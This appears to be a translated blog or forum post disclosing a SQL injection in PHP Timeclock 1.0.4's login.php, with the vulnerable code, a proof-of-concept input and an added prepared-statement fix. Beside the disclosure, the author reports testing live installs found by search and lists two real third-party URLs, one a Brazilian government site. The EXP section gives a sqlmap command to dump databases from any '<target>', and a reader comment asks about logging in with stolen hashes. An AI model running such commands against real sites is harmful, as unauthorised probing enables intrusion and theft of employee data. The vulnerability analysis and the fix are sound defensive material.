PHP Timeclock 1.0.4 login file vulnerability [+Exp +PoC]
Yesterday I helped a friend look at the PHP Timeclock they have been using; they said they had recently noticed a lot of audit log entries. I googled it, found the project on SourceForge, downloaded the version my friend runs (1.0.4) and started auditing it.
Official project description:
PHP Timeclock is a simple yet effective web-based time clock system. It allows you to track all employee time as well as upcoming vacations and more, it can also replace manual sign-in sheets and such. It is written in php and utilizes a mysql database.
====================PoC==================
Logging in produces an error (login.php):
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /var/www/html/login.php on line 19
Looking at the code of the corresponding file, the problem is easy to spot:
if (isset($_POST['login_userid']) && (isset($_POST['login_password']))) {
    $login_userid = $_POST['login_userid'];                  // taken from the request unfiltered
    $login_password = crypt($_POST['login_password'], 'xy'); // fixed salt 'xy'
    // the username is concatenated straight into the SQL string: this is the injection point
    $query = "select empfullname, employee_passwd, admin, time_admin from ".$db_prefix."employees
              where empfullname = '".$login_userid."'";
    $result = mysql_query($query); // returns false on a SQL syntax error, hence the warning above
    while ($row=mysql_fetch_array($result)) {
        $admin_username = "".$row['empfullname']."";
        $admin_password = "".$row['employee_passwd']."";
        $admin_auth = "".$row['admin']."";
        $time_admin_auth = "".$row['time_admin']."";
    }
}

Test input that triggers the error:
Username: exp'
Password: Moreexp
This triggers the error, confirming the injection.
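For comparison, the same lookup written with a prepared statement, added here as an example (not part of the original post or of PHP Timeclock's own code): the username is bound as a parameter via mysqli, so a value such as exp' is sent as data and cannot change the query, and the password is checked in PHP. It assumes an open mysqli connection $db, the $db_prefix variable from the original, and that mysqlnd is available for get_result().

```php
<?php
// Added example: parameterised version of the login lookup from login.php.
// Assumes $db is an open mysqli connection and $db_prefix is the table prefix
// used by the original application (both taken from the surrounding code).

function timeclock_login(mysqli $db, string $db_prefix, string $userid, string $password): ?array
{
    // The prefix is configuration, not user input, but it cannot be bound as a
    // parameter, so restrict it to identifier characters before interpolating it.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $db_prefix)) {
        throw new InvalidArgumentException('invalid table prefix');
    }

    $sql = "SELECT empfullname, employee_passwd, admin, time_admin "
         . "FROM {$db_prefix}employees WHERE empfullname = ?";
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    // Bound as a string: "exp'" is transmitted as a value, never spliced into SQL.
    $stmt->bind_param('s', $userid);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    if ($row === null) {
        return null; // unknown user
    }

    // The original scheme stores crypt($password, 'xy'); passing the stored hash as
    // the salt reproduces the same hash, and hash_equals() compares in constant time.
    $stored = $row['employee_passwd'];
    if (!hash_equals($stored, crypt($password, $stored))) {
        return null; // wrong password
    }

    return [
        'empfullname' => $row['empfullname'],
        'admin'       => $row['admin'],
        'time_admin'  => $row['time_admin'],
    ];
}

if (isset($_POST['login_userid'], $_POST['login_password'])) {
    $user = timeclock_login($db, $db_prefix, $_POST['login_userid'], $_POST['login_password']);
    if ($user === null) {
        error_log('failed login for ' . $_POST['login_userid']); // audit trail for failed attempts
    }
}
```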
========================================
Searching MegaEXP for the keyword turned up a few demo installs; I tested them, and one of them is even a .gov.br site, not sure whether it has anything to do with zf.
http://www.quecomputersmankato.com/timeclock/login.php
http://www.pontoweb.ac.gov.br/login.php
===================EXP==================
The target address is usually:
http://<target>/timeclock-1.04/login.php 或 http://<target>/login.php
Once the vulnerability has been confirmed, sqlmap can be run against it:
sqlmap --url="http://<target>/login.php" --data="login_userid=admin&login_password=moreexp" -p login_userid --random-agent --level=5 --risk=3 --dbs
===================== Result ===================
Output of a successful test:
That's all.
O(∩_∩)O Thanks!!!!!!
Can I log in with the uid and md5? Thanks.
Taking this for research.
Just having a look.